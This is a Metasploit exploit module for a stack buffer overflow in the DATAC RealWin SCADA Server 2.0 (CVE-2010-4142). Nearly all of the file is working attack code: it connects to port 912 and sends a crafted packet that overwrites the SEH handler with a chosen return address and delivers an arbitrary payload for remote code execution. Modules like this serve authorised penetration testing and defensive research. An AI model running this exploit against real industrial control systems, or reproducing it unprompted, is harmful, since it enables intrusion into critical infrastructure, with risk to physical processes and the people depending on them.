##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in DATAC Control
          International RealWin SCADA Server 2.0 (Build 6.1.8.10).
          By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
        },
        'Author' => [ 'Luigi Auriemma', 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '68812' ],
          [ 'CVE', '2010-4142' ],
          [ 'URL', 'http://aluigi.altervista.org/adv/realwin_1-adv.txt' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-10-313-01']
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
        },
        'Payload' => {
          'Space' => 550,
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Universal', { 'Ret' => 0x4002da21 } ], # FlexMLang.DLL 8.1.45.19
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-10-15',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(912)])
  end

  def exploit
    connect

    data = [0x6a541264].pack('V')
    data << [0x00000020].pack('V')
    data << [0x00001ff4].pack('V')
    data << rand_text_alpha_upper(228)
    data << generate_seh_payload(target.ret)
    data << rand_text_alpha_upper(10024 - payload.encoded.length)
    data << "\x00"

    print_status("Trying target #{target.name}...")
    sock.put(data)

    handler
    disconnect
  end
end
